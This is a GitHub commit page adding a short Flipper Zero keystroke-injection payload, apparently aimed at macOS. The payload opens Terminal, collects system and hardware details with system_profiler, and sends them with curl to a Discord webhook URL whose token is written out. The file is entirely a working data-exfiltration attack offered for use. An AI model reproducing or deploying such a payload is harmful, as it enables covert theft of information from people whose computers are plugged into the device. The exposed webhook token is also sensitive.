Skip to content

Commit

Permalink
Create payload.txt
Browse files Browse the repository at this point in the history
Signed-off-by: bst04 <[email protected]>
  • Loading branch information
bst04 authored Nov 2, 2024
1 parent 2ceddbd commit 6b3b8ac
Showing 1 changed file with 13 additions and 0 deletions.
13 changes: 13 additions & 0 deletions iOS/SendSysInfo-FlipZero/payload.txt
Original file line number Diff line number Diff line change
@@ -0,0 +1,13 @@

GUI SPACE
DELAY 2500
STRING TERMINAL
DELAY 250
ENTER
STRING sys=$(system_profiler SPSoftwareDataType SPHardwareDataType)
DELAY 500
ENTER
DELAY 250
STRING curl -X POST -H "Content-Type: application/x-www-form-urlencoded" --data-urlencode "content=$sys” https://discord.com/api/webhooks/1296512673327878145/0h0RYRZEzKa3mIOsSYOJFLbRcxs5KUBhxP1oBbWdbKqbPgzKvENd8yKmyxALnTnpylOL
DELAY 750
ENTER

0 comments on commit 6b3b8ac

Please sign in to comment.